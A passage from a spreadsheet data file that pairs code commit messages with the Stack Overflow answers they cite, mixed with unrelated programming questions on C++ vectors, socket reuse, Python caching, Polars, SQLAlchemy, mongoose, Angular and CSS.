unique_ptr
is specified to be equal to
nullptr
after being moved from).  However the requirements for
vector
are such that there are not too many options.
The answer depends on whether we're talking about
vector
's move constructor or move assignment operator.  In the latter case, the answer also depends on the
vector
's allocator.
vector&lt;T, A&gt;::vector(vector&amp;&amp; v)
This operation must have constant complexity.  That means that there are no options but to steal resources from
v
to construct
*this
, leaving
v
in an empty state.  This is true no matter what the allocator
A
is, nor what the type
T
is.
So for the move constructor, yes, the moved-from
vector
will always be empty.  This is not directly specified, but falls out of the complexity requirement, and the fact that there is no other way to implement it.
vector&lt;T, A&gt;&amp;
vector&lt;T, A&gt;::operator=(vector&amp;&amp; v)
This is considerably more complicated.  There are 3 major cases:
One:
allocator_traits&lt;A&gt;::propagate_on_container_move_assignment::value == true
(
propagate_on_container_move_assignment
evaluates to
true_type
)
In this case the move assignment operator will destruct all elements in
*this
, deallocate capacity using the allocator from
*this
, move assign the allocators, and then transfer ownership of the memory buffer from
v
to
*this
.  Except for the destruction of elements in
*this
, this is an O(1) complexity operation.  And typically (e.g. in most but not all std::algorithms), the lhs of a move assignment has
empty() == true
prior to the move assignment.
Note:  In C++11 the
propagate_on_container_move_assignment
for
std::allocator
is
false_type
, but this has been changed to
true_type
for C++1y (y == 4 we hope).
In case One, the moved-from
vector
will always be empty.
Two:
allocator_traits&lt;A&gt;::propagate_on_container_move_assignment::value == false
    &amp;&amp; get_allocator() == v.get_allocator()
(
propagate_on_container_move_assignment
evaluates to
false_type
, and the two allocators compare equal)
In this case, the move assignment operator behaves just like case One, with the following exceptions:
The allocators are not move assigned.
The decision between this case and case Three happens at run time, and case Three requires more of
T
, and thus so does case Two, even though case Two doesn't actually execute those extra requirements on
T
.
In case Two, the moved-from
vector
will always be empty.
Three:
allocator_traits&lt;A&gt;::propagate_on_container_move_assignment::value == false
    &amp;&amp; get_allocator() != v.get_allocator()
(
propagate_on_container_move_assignment
evaluates to
false_type
, and the two allocators do not compare equal)
In this case the implementation can not move assign the allocators, nor can it transfer any resources from
v
to
*this
(resources being the memory buffer).  In this case, the only way to implement the move assignment operator is to effectively:
typedef move_iterator&lt;iterator&gt; Ip;
assign(Ip(v.begin()), Ip(v.end()));
That is, move each individual
T
from
v
to
*this
.  The
assign
can reuse both
capacity
and
size
in
*this
if available.  For example if
*this
has the same
size
as
v
the implementation can move assign each
T
from
v
to
*this
.  This requires
T
to be
MoveAssignable
.  Note that
MoveAssignable
does not require
T
to have a move assignment operator.  A copy assignment operator will also suffice.
MoveAssignable
just means
T
has to be assignable from an rvalue
T
.
If the
size
of
*this
is not sufficient, then new
T
will have to be constructed in
*this
.  This requires
T
to be
MoveInsertable
.  For any sane allocator I can think of,
MoveInsertable
boils down to the same thing as
MoveConstructible
, which means constructible from an rvalue
T
(does not imply the existence of a move constructor for
T
).
In case Three, the moved-from
vector
will in general not be empty.  It could be full of moved-from elements.  If the elements don't have a move constructor, this could be equivalent to a copy assignment.  However, there is nothing that mandates this.  The implementor is free to do some extra work and execute
v.clear()
if he so desires, leaving
v
empty.  I am not aware of any implementation doing so, nor am I aware of any motivation for an implementation to do so.  But I don't see anything forbidding it.
David Rodríguez reports that GCC 4.8.1 calls
v.clear()
in this case, leaving
v
empty.
libc++
does not, leaving
v
not empty.  Both implementations are conforming.</t>
  </si>
  <si>
    <t xml:space="preserve">I'll try to be brief. 
What is the best practice for calling a routine from an asp.net web application that initiates a lengthy 'background' process that must be run?
For example, I want to click a button on my webpage that says "Run data conversion" (for example). This data conversion routine may take 20-40 minutes to run, so it seems to me putting all that code into a asp.net web page is not the way to go....there is no need to run this background process thru the IIS server. A sperate service or app etc seemx the way to go...
The web app, and the background process will both run on my dedicated Win2003 server so I have lots of options - but what is the best one?
</t>
  </si>
  <si>
    <t>C423</t>
  </si>
  <si>
    <t>server: use SO_LINGER to be able to quickly reuse a connection
When retrying a connecting (in the case of auth), and specifying a srcport,
SO_REUSEADDR does not work, SO_LINGER is the trick to not get
a EADDRNOTAVAIL.
See:
https://stackoverflow.com/questions/3886506/why-would-connect-give-eaddrnotavail</t>
  </si>
  <si>
    <t>Check this link: http://www.toptip.ca/2010/02/linux-eaddrnotavail-address-not.html
EDIT: Yes I meant to add more but had to cut it there because of an emergency
Did you close the socket before attempting to reconnect? Closing will tell the system that the socketpair (ip/port) is now free.
Here are additional items too look at:
If the local port is already connected to the given remote IP and port (i.e., there's already an identical socketpair), you'll receive this error (see bug link below).
Binding a socket address which isn't the local one will produce this error. if the IP addresses of a machine are 127.0.0.1 and 1.2.3.4, and you're trying to bind to 1.2.3.5 you are going to get this error.
EADDRNOTAVAIL: The specified address is unavailable on the remote machine or the address field of the name structure is all zeroes.
Link with a bug similar to yours (answer is close to the bottom)
https://bugs.java.com/bugdatabase/view_bug?bug_id=4294599
It seems that your socket is basically stuck in one of the TCP internal states and that adding a delay for reconnection might solve your problem as they seem to have done in that bug report.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have tried writing a simple program that converts 2 digit Roman numbers into 1 digit Arabic number. I don't know where the error could be. I double checked everything multiple times.&lt;/p&gt;
&lt;p&gt;According to GNU debugger, the values of AL and BL are as &lt;strong&gt;intended&lt;/strong&gt;. I think that the &lt;strong&gt;sys_write&lt;/strong&gt; fails most of the time. Also, please don't complain about repetitive instructions, I just hate making subroutines.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SECTION .data
zprava db 'rimske cislo:' 
znakyzprava equ $-zprava 
linefeed db 0xA
SECTION .bss
inputcislo resb 2 
SECTION .text
global _start
_start:
mov edx,znakyzprava
mov ecx,zprava
mov ebx,1
mov eax,4
int 80h  
mov edx,2 
mov ecx,inputcislo 
mov ebx,0 
mov eax,3 
int 80h
uzmamdata:
mov al,[inputcislo] 
mov bl,[inputcislo+1]
hodnotyznaku:
cmp al,73
jz ali
cmp al,86
jz alv
cmp al,88
jz alx
pulka:
cmp bl,73
jz ahi
cmp bl,86
jz ahv
cmp bl,88
jz ahx
jmp konechodnot
ali:
mov al,1
jmp pulka
alv:
mov al,5
jmp pulka
alx:
mov al,10
jmp pulka
ahi:
mov bl,1
jmp konechodnot
ahv:
mov bl,5
jmp konechodnot
ahx:
mov bl,10
jmp konechodnot
konechodnot:
cmp al,bl
jg alvet ;kdyz je al vetsi nez ah
jl almen
alvet:
sub al,bl
jmp dale
almen:
add al,bl
jmp dale
dale:
add al,48 
mov edx,1 
mov ecx,0
add cl,al
mov ebx,1
mov eax,4
int 80h
mov edx,1 
mov ecx,linefeed
mov ebx,1
mov eax,4
int 80h
konec:
mov ebx,0
mov eax,1
int 80h
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C424</t>
  </si>
  <si>
    <t>read wsdl fix: http://stackoverflow.com/questions/6038226/suds-is-not-reusing-cached-wsdls-and-xsds-although-i-expect-it-to</t>
  </si>
  <si>
    <t>The problem is in the suds library itself.  In cache.py, although ObjectCache.get() is always getting a valid file pointer, it's hitting an exception (EOFError) doing pickle.load(fp).  When that happens, the file is just downloaded again.
Here's the sequence of events:
DocumentReader.open():
Trying http://172.28.50.249/wsdl/billingServices/v3.0/RequestScrubAddress.wsdl
Loading ObjectCache 51012453-document
Loading pickled object...
Exception raised: &lt;type 'exceptions.EOFError'&gt;
Got None from cache
Downloading...  Done
Saving FileCache 51012453-document... Done
So it doesn't really matter that the new cache file was saved, because the same thing happens the next time I run.  This happens for ALL of WSDL and XSD files.
I fixed that problem by opening the cache file in binary mode when reading and writing.  Specifically, the changes I made were in cache.py:
1) In FileCache.put(), change this line:
f = self.open(fn, 'w')
to
f = self.open(fn, 'wb')
2) In FileCache.getf(), change this line:
return self.open(fn)
to
return self.open(fn, 'rb')
I don't know the codebase well enough to know if these changes are safe, but it is pulling the objects from the file cache, the service is still running successfully, and loading the client went from 16 seconds down to 2.5 seconds.  Much better if you ask me.
Hopefully this fix, or something similar can be introduced back into the suds main line.  I've already sent this to the suds mailing list (fedora-suds-list at redhat dot com).</t>
  </si>
  <si>
    <t xml:space="preserve">I have a very large app, 1.5 million lines of C++, which is currently MFC based using the Document/View architecture.  The application includes a lot of 3d vector graphics, spreadsheets, and very many dialogs and Windows.  Within the constraints of the DVA it is fairly well written, in that there is no significant program logic in the user interface, and anything that can be done using the user interface can also be carried out programmatically using a COM/OLE Automation interface.
At the request of a number of users, I have been toying with the idea of creating a browser interface to the program, where the program itself runs on a server.  Thoughts so far are convert all the COM interfaces to DCOM and rewrite/port the UI to Java.  Initial experimentation shows that this will be a huge amount of work.
Anyone else out there got any ideas for an easier implmentation?  Anyone come across any refactoring or similar tools specifically to help this kind of a port?
</t>
  </si>
  <si>
    <t>C425</t>
  </si>
  <si>
    <t>Add tests.
Mainly inspired from this SO question &lt;http://stackoverflow.com/questions/3841725/how-to-launch-tests-for-django-reusable-app&gt;.</t>
  </si>
  <si>
    <t>I've ended with such solution (it was inspired by solution found in django-voting):
Create file eg. 'runtests.py' in tests dir containing:
import os, sys
from django.conf import settings
DIRNAME = os.path.dirname(__file__)
settings.configure(DEBUG = True,
                   DATABASE_ENGINE = 'sqlite3',
                   DATABASE_NAME = os.path.join(DIRNAME, 'database.db'),
                   INSTALLED_APPS = ('django.contrib.auth',
                                     'django.contrib.contenttypes',
                                     'django.contrib.sessions',
                                     'django.contrib.admin',
                                     'myapp',
                                     'myapp.tests',))
from django.test.simple import run_tests
failures = run_tests(['myapp',], verbosity=1)
if failures:
    sys.exit(failures)
It allows to run tests by
python runtests.py
command.
It doesn't require installed dependencies (eg. buildout) and it doesn't harm tests run when app is incorporated into bigger project.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The breakpoints data is the following:&lt;/p&gt;
&lt;pre class="lang-py prettyprint-override"&gt;&lt;code&gt;breakpoints = pl.DataFrame(
    {
        &amp;quot;features&amp;quot;: [&amp;quot;feature_0&amp;quot;, &amp;quot;feature_0&amp;quot;, &amp;quot;feature_1&amp;quot;],
        &amp;quot;breakpoints&amp;quot;: [0.1, 0.5, 1],
        &amp;quot;n_possible_bins&amp;quot;: [3, 3, 2],
    }
)
print(breakpoints)
out:
shape: (3, 3)
â”Œâ”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”¬â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”¬â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”
â”‚ features  â”† breakpoints â”† n_possible_bins â”‚
â”‚ ---       â”† ---         â”† ---             â”‚
â”‚ str       â”† f64         â”† i64             â”‚
â•žâ•â•â•â•â•â•â•â•â•â•â•â•ªâ•â•â•â•â•â•â•â•â•â•â•â•â•â•ªâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•¡
â”‚ feature_0 â”† 0.1         â”† 3               â”‚
â”‚ feature_0 â”† 0.5         â”† 3               â”‚
â”‚ feature_1 â”† 1.0         â”† 2               â”‚
â””â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”´â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”´â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”˜
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;df&lt;/code&gt; has two continous variables that we wish to encode according to the &lt;code&gt;breakpoints&lt;/code&gt; DataFrame:&lt;/p&gt;
&lt;pre class="lang-py prettyprint-override"&gt;&lt;code&gt;df = pl.DataFrame(
    {&amp;quot;feature_0&amp;quot;: [0.05, 0.2, 0.6, 0.8], &amp;quot;feature_1&amp;quot;: [0.5, 1.5, 1.0, 1.1]}
)
print(df)
out:
shape: (4, 2)
â”Œâ”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”¬â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”
â”‚ feature_0 â”† feature_1 â”‚
â”‚ ---       â”† ---       â”‚
â”‚ f64       â”† f64       â”‚
â•žâ•â•â•â•â•â•â•â•â•â•â•â•ªâ•â•â•â•â•â•â•â•â•â•â•â•¡
â”‚ 0.05      â”† 0.5       â”‚
â”‚ 0.2       â”† 1.5       â”‚
â”‚ 0.6       â”† 1.0       â”‚
â”‚ 0.8       â”† 1.1       â”‚
â””â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”´â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”˜
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;After the encoding we should have the resulting DataFrame &lt;code&gt;encoded_df&lt;/code&gt;:&lt;/p&gt;
&lt;pre class="lang-py prettyprint-override"&gt;&lt;code&gt;encoded_df = pl.DataFrame({&amp;quot;feature_0&amp;quot;: [0, 1, 2, 2], &amp;quot;feature_1&amp;quot;: [0, 1, 0, 1]})
print(encoded_df)
out:
shape: (4, 2)
â”Œâ”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”¬â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”
â”‚ feature_0 â”† feature_1 â”‚
â”‚ ---       â”† ---       â”‚
â”‚ i64       â”† i64       â”‚
â•žâ•â•â•â•â•â•â•â•â•â•â•â•ªâ•â•â•â•â•â•â•â•â•â•â•â•¡
â”‚ 0         â”† 0         â”‚
â”‚ 1         â”† 1         â”‚
â”‚ 2         â”† 0         â”‚
â”‚ 2         â”† 1         â”‚
â””â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”´â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”˜
&lt;/code&gt;&lt;/pre&gt;
&lt;ol&gt;
&lt;li&gt;We can assume that the unique list of features in &lt;code&gt;encoded_df&lt;/code&gt; are also available in &lt;code&gt;breakpoints&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Labels should be an array: &lt;code&gt;np.array([str(i) for i in range(n_possible_bins)])&lt;/code&gt;, assuming &lt;code&gt;n_possible_bins&lt;/code&gt; is a positive integer. &lt;code&gt;n_possible_bins&lt;/code&gt; may be different across features.&lt;/li&gt;
&lt;li&gt;All the encoding follows &lt;code&gt;left_closed=False&lt;/code&gt; where the bins are defined as &lt;code&gt;(breakpoint, next breakpoint]&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I know that &lt;a href="https://docs.pola.rs/api/python/dev/reference/expressions/api/polars.Expr.cut.html" rel="nofollow noreferrer"&gt;Polars.Expr.cut()&lt;/a&gt; takes in &lt;code&gt;breaks&lt;/code&gt; parameter as &lt;code&gt;Sequence[float]&lt;/code&gt;, but how do I pass in these breakpoints and labels from the &lt;code&gt;breakpoints&lt;/code&gt; DataFrame effectively?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C426</t>
  </si>
  <si>
    <t>RegExp optimizations, thanks to suggestions published here: http://stackoverflow.com/questions/30281916/regexp-sub-pattern-reuse-for-different-open-close-conditions</t>
  </si>
  <si>
    <t>You can use an extremely hacky way of matching specific opening and closing braces when used together:
\$(?:(\[)|(\()|({)|(\/)).*?(?:(?=\2)(?=\3)(?=\4)\]|(?=\1)(?=\3)(?=\4)\)|(?=\1)(?=\2)(?=\4)}|(?=\1)(?=\2)(?=\3)\/)
                        ^^^ Inner Match Here
It basically looks for all groups except one specific one to be empty and happens to only work in JavaScript regex. The
.*?
section pointed out in the above code just needs to be replaced with the regex to be matched inside of the braces to match an arbitrary pattern.
Demo:
https://regex101.com/r/aX7rH1/1
// Matches
${...}
$(...)
$[...]
$/.../
// Does Not Match
${...)
${...]
${.../
$(...}
$(...]
$(.../
$[...}
$[...)
$[.../
$/...}
$/...)
$/...]</t>
  </si>
  <si>
    <t xml:space="preserve">I'm taking over a development of a commercial web site. This site was developed over two years by another programmer. It's mostly a one-man job (maintain and expand the site). I'll have a 2-3 days transition period when the other programmer will show me the system. But from what I know, there is little documentation. Everything is in the code (which is kind of documented). Here is  what I'm planning to ask so far:
Explanation on the most complex elements of the system
Description of the overall architecture
Description of the support tools (IDE setup, unit tests, deployment
mechanism)
Any book, website, podcast he used to influence the architecture of the
system
Any other I'm missing?
[EDIT] Thanks everyone. Lost of good propositions. I wished I could accept more than one answer! Additionally, I would also add: 
What have you done specifically to improve the performance of the system, and where is the bottleneck right now?
Related to that, what have you done regarding the security of the system? (what have you done, and where are the security holes right now)
One last thing: the developer said that he will be available to to answer my questions later on if I need it. It's his "baby" after all. But I really think that in 6 months he will have moved on and his availability will be much more reduced!
</t>
  </si>
  <si>
    <t>C427</t>
  </si>
  <si>
    <t>CMake PCH enabled
- even testsuites compiles with PCH enabled, see
  [Boost.Test linker error by use with precompiled headers (PCH)](
   https://stackoverflow.com/questions/66535719/boost-test-linker-error-by-use-with-precompiled-headers-pch)
- PCH enabled by default
- TBD: reusing precompile headers, see
  https://cmake.org/cmake/help/git-stage/command/target_precompile_headers.html</t>
  </si>
  <si>
    <t>Alan Birtles got the hint into the right direction. I was not aware of the influence of the compiler switch BOOST_TEST_DYN_LINK for the single file in the context of PCH here. A definition for all files of the project in the style of:
target_compile_definitions(${PROJECT_NAME} PRIVATE
        "BOOST_TEST_DYN_LINK")
incomprehensibly does not solve the problem. Only after setting the property
SKIP_PRECOMPILE_HEADERS
for driver 'main' it compiles and links as expected:
project(boost_utf_pch LANGUAGES CXX)
    cmake_minimum_required(VERSION 3.18)
    add_executable(${PROJECT_NAME} "")
    find_package(Boost 1.73.0 REQUIRED COMPONENTS 
        unit_test_framework)
    target_sources(${PROJECT_NAME} PRIVATE
        test_driver.cpp test.cpp)
    target_link_libraries(${PROJECT_NAME} PRIVATE
        Boost::unit_test_framework)
    set_source_files_properties(test_driver.cpp
        APPEND PROPERTIES COMPILE_DEFINITIONS "BOOST_TEST_DYN_LINK")
    set_source_files_properties(test_driver.cpp
        PROPERTIES SKIP_PRECOMPILE_HEADERS ON)
    option(EDA_ENABLE_PCH "Enable PCH" ON)
    if (EDA_ENABLE_PCH)
        target_precompile_headers(${PROJECT_NAME} PRIVATE pch.hpp)
    endif()</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an existing ASP.NET MVC app on .NET 4.7.2 that we are updating and also trying to implement SSO using WSFederation. In our &lt;code&gt;Startup&lt;/code&gt; class, we have the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public void Configuration(IAppBuilder app)
{
    app.MapSignalR();
    app.SetDefaultSignInAsAuthenticationType (WsFederationAuthenticationDefaults.AuthenticationType);
    app.UseCookieAuthentication(new CookieAuthenticationOptions
        {
            AuthenticationType = WsFederationAuthenticationDefaults.AuthenticationType
        });
    app.UseWsFederationAuthentication(new WsFederationAuthenticationOptions
        {
            MetadataAddress = &amp;quot;https://login.microsoftonline.com/##########&amp;quot;,
            Wtrealm = &amp;quot;https://xxxxxxxxxx/appname&amp;quot;
        });
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In our &lt;code&gt;web.config&lt;/code&gt; in the &lt;code&gt;system.web&lt;/code&gt; section, we have the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;authentication mode=&amp;quot;None&amp;quot; /&amp;gt;
&amp;lt;sessionState timeout=&amp;quot;15&amp;quot; /&amp;gt;
&amp;lt;customErrors mode=&amp;quot;Off&amp;quot; /&amp;gt;
&amp;lt;authorization&amp;gt;
    &amp;lt;deny users=&amp;quot;?&amp;quot; /&amp;gt;
&amp;lt;/authorization&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When we try to run the app locally, we get this error:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Access is denied.&lt;/p&gt;
&lt;p&gt;Description: An error occurred while accessing the resources required to serve this request. The server may not be configured for access to the requested URL.&lt;/p&gt;
&lt;p&gt;Error message 401.2.: Unauthorized: Logon failed due to server configuration. Verify that you have permission to view this directory or page based on the credentials you supplied and the authentication methods enabled on the Web server. Contact the Web server's administrator for additional assistance.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The code does not even try to redirect to the &lt;code&gt;https://login.microsoftonline.com&lt;/code&gt; url for authentication, it just immediately throws the error.&lt;/p&gt;
&lt;p&gt;--- UPDATE
I have added the following in FilterConfig.cs:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;filters.Add(new AuthorizeAttribute());
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And set authentication mode=&amp;quot;forms&amp;quot; in web.config &amp;lt;system.web&amp;gt;&lt;/p&gt;
&lt;p&gt;Then it would reach out to login.microsoftonline.com to authenticate but it seems like its in a loop and not actually returning to my accountsController.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/bZthH7WU.jpg" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/bZthH7WU.jpg" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I have added break points in accountsController.Login  but it never stops there it just keeps looping as in the SamlTracer above.&lt;/p&gt;
&lt;p&gt;So I am closer but still missing something?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C428</t>
  </si>
  <si>
    <t>Update IASKSpecifier.m
Support non-existing add specifier for lists. 
Related Stack Overflow: https://stackoverflow.com/questions/64812361/how-can-i-reuse-a-plist-file-with-inappsettingskit
By allowing the `specifierDictionary` to be `null`, no `AddSpecifier` is required.
This can be used where there is a pre-defined list and the delete option not being true.
Tested/verified locally</t>
  </si>
  <si>
    <t>IASK doesn't support a dynamic variable resolution in plists. However, you should be able to achieve this with a custom build script that generates the different plist files at compile time from one master file with variable replacement. Use
/usr/libexec/PlistBuddy
to work with plist files.</t>
  </si>
  <si>
    <t xml:space="preserve">I have a a C# (FFx 3.5) application that loads DLLs as plug-ins.  These plug-ins are loaded in separate AppDomains (for lots of good reasons, and this architecture cannot change).  This is all well and good.
I now have a requirement to show a Dialog from one of those plug-ins.  Bear in mind that I cannot return the dialog Form to the main application and have it displayed there (the current infrastructure doesn't support it).
Failure 1
In my DLL I created a Form and called Show.  The dialog outline showed up but did not paint and it doesn't respond to mouse events. I assumed that this is becasue the DLL is in a separate AppDomain and the message pump for the app is somehow unable to dispatch messages to the new Form.
Failure 2
In my DLL I created a Form and called ShowDialog, which by all rights should create an internal message pump for the dialog..  The dialog is displayed and responded to clicks (hooray), but it appears that the primary app no longer is processing or dispatching windows messages because it quits painting and no longer responds to mouse events.  For some reason now it seems that the main app's message pump is not dispatching.
Failure 3
In my DLL I created a Form and called Application.Run.  This will certainly create a complete second message pump.  I get the same behavior as Failure 2 - the Dialog behaves, but the calling app does not.
Any thoughts on what exactly is going on here and how I might go about showing a dialog from the other AppDomain's DLL and have both the caller and the callee still respond and paint properly?
</t>
  </si>
  <si>
    <t>C429</t>
  </si>
  <si>
    <t>Add sqlalchemy.scoped_session teardown
https://stackoverflow.com/a/34010159
Flask + mod_wsgi tend to restart the server, reloading Python code
without actually exiting the process. This means the SQLAlchemy
scoped_session never gets torn down, and seems to be reused across
threads.
Explicitly shut down the session to prevent this. (This is auto-handled
for us when using Flask-SQLAlchemy.)</t>
  </si>
  <si>
    <t>SQLAlchemy (and in this case SQLite also) doesn't work if you share a session across threads.  You may not be using threads explicitly, but mod_wsgi is, and you've defined a global session object.  Either use scoped_session to handle creating a unique session for each thread.
session = scoped_session(sessionmaker(bind=engine))
@app.teardown_request
def remove_session(ex=None):
    session.remove()
@app.route('/')
def example():
    item = session.query(MyModel).filter(...).all()
    ...
Preferably, use Flask-SQLAlchemy which handles this and other things for you.  The SQLAlchemy docs recommend you use the integration library rather than doing this yourself.
db = SQLAlchemy(app)
@app.route('/')
def example():
    item = db.session.query(MyModel).filter(...).all()
    ...
Also note that you should only be defining the engine, session, etc. once and importing it elsewhere, rather than redefining it in each file like your current code does.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;{
  &amp;quot;_id&amp;quot;: {
    &amp;quot;$oid&amp;quot;: &amp;quot;67b645c7261305c279232020&amp;quot;
  },
  &amp;quot;settings&amp;quot;: {
    &amp;quot;name&amp;quot;: &amp;quot;Field&amp;quot;,
    &amp;quot;isVisible&amp;quot;: true,
    &amp;quot;isReadOnly&amp;quot;: false,
    &amp;quot;_id&amp;quot;: {
      &amp;quot;$oid&amp;quot;: &amp;quot;67b645c7261305c279232021&amp;quot;
    }
  },
  &amp;quot;fields&amp;quot;: [
    {
      &amp;quot;type&amp;quot;: &amp;quot;text&amp;quot;,
      &amp;quot;name&amp;quot;: &amp;quot;two&amp;quot;,
      &amp;quot;_id&amp;quot;: {
        &amp;quot;$oid&amp;quot;: &amp;quot;67b64682e20507d022fffdde&amp;quot;
      }
    }
  ],
  &amp;quot;__v&amp;quot;: 0
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/26qj5RfM.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/26qj5RfM.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;How to remove from &lt;code&gt;fields&lt;/code&gt; array the object which &lt;code&gt;_id&lt;/code&gt; is &lt;code&gt;&amp;quot;67b64682e20507d022fffdde&amp;quot;&lt;/code&gt; using &lt;code&gt;mongoose&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;I can delete by any field but not by &lt;code&gt;_id&lt;/code&gt;. May be because they are not plain strings but &lt;code&gt;ObjectId&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I tried this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Forms.findByIdAndUpdate(formId, {
  $pull: {
    'fields': { _id: fieldId }
  },
}, {
  new: true
})
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Also tried &lt;code&gt;updateOne&lt;/code&gt;, &lt;code&gt;$pullAll&lt;/code&gt; and &lt;code&gt;[{ _id: fieldId }]&lt;/code&gt; nothing helped&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C43</t>
  </si>
  <si>
    <t>General cleanup, bug fix, and optimization
Created resolvers folder
Fixed advanced search jumping on click
Created cache for fixed resolvers: dates, folder-tree, folder, metadataList, and modules (Code source: https://stackoverflow.com/questions/51484623/angular-6-only-call-a-resolver-once)</t>
  </si>
  <si>
    <t>One way of doing this is to introduce a replay subject in the resolver which will act as a cache. The resolver will always return this subject, but it will only request data, if it has not requested any data yet.
I made a simple example where the resolver only has to return a number, which it gets from a simple data service.
class Resolver implements Resolve&lt;number&gt; {
    // We need to keep track on if a request has already been sent
    requested = false;
    // The replay subject will emit the last value that has been passed in
    subject = new ReplaySubject&lt;number&gt;(1);
    resolve(route: ActivatedRouteSnapshot): Observable {
        // Request data only if it has not been requested yet
        if (!this.requested) {
            this.requested = true;
            // Do your heavy call here
            this.service.getData()
                // Emit your data into the subject
                .subscribe(nr =&gt; this.subject.next(nr));
        }
        // Return the subject. Pipe in first() because resolvers 
        // only emit on completion of an observable.
        return this.subject.pipe(first());
    }
}
You should be able to do the same. If you have multiple calls you can either use forkJoin or similar to execute both calls and supply the result to the replay subject. Or you could create two separate resolvers, which are only responsible for one result object each.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As I learned and tested that below code will set Select2 pull down list width.  It applies to all Select2 on a HTML page.&lt;/p&gt;
&lt;pre class="lang-css prettyprint-override"&gt;&lt;code&gt;.select2-container {
    width: 200px !important; 
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have couple Select2 and I want to change below #company width only to 500px.&lt;/p&gt;
&lt;pre class="lang-html prettyprint-override"&gt;&lt;code&gt;&amp;lt;div class=&amp;quot;field-container&amp;quot; style=&amp;quot;width: 600px !important&amp;quot;&amp;gt;
    &amp;lt;label&amp;gt;Company:&amp;lt;/label&amp;gt;
    &amp;lt;select id=&amp;quot;company&amp;quot; style=&amp;quot;width: 500px !important&amp;quot;&amp;gt;
       &amp;lt;option value=&amp;quot;&amp;quot;&amp;gt;&amp;lt;/option&amp;gt;
    &amp;lt;/select&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The style=&amp;quot;width: 600px !important&amp;quot; does set my Select2 container width to 600px.&lt;/p&gt;
&lt;p&gt;style=&amp;quot;width: 500px !important&amp;quot; does not work.&lt;/p&gt;
&lt;p&gt;I tried to use below to override pulldown selection width for #company.  It does not work.&lt;/p&gt;
&lt;pre class="lang-css prettyprint-override"&gt;&lt;code&gt;#select2-company-container {
  width: 500px !important;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How to change #company pulldown list width?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C430</t>
  </si>
  <si>
    <t>ng-deeps now only apply to current component
https://stackoverflow.com/questions/46786986/how-and-where-to-use-ng-deep</t>
  </si>
  <si>
    <t>Usually  /deep/ “shadow-piercing” combinator  can be used to force a style down to child components. This selector had an alias &gt;&gt;&gt; and now has another one called ::ng-deep.
since /deep/ combinator has been deprecated,  it is recommended to use ::ng-deep
For example:
&lt;div class="overview tab-pane" id="overview" role="tabpanel" [innerHTML]="project?.getContent( 'DETAILS')"&gt;&lt;/div&gt;
and css
.overview {
    ::ng-deep {
        p {
            &amp;:last-child {
                margin-bottom: 0;
            }
        }
    }
}
it will be applied to child components</t>
  </si>
  <si>
    <t xml:space="preserve">I've actually asked about this already in [external-link] although we've gone back to the drawing board and found it's much more difficult than we initially thought.  We develop a large (and very much relied upon) Intranet system which has evolved tremendously over the years.
The problem is that it uses frames to have a menu on the left, a header at the top and the main page thereafter.  This is done to make sure the other elements are static whilst you're able to scroll through the pages.  Now we've come up with a solution to achieve this using a single page and CSS, but the problem lay in the actual architecture of our web application.
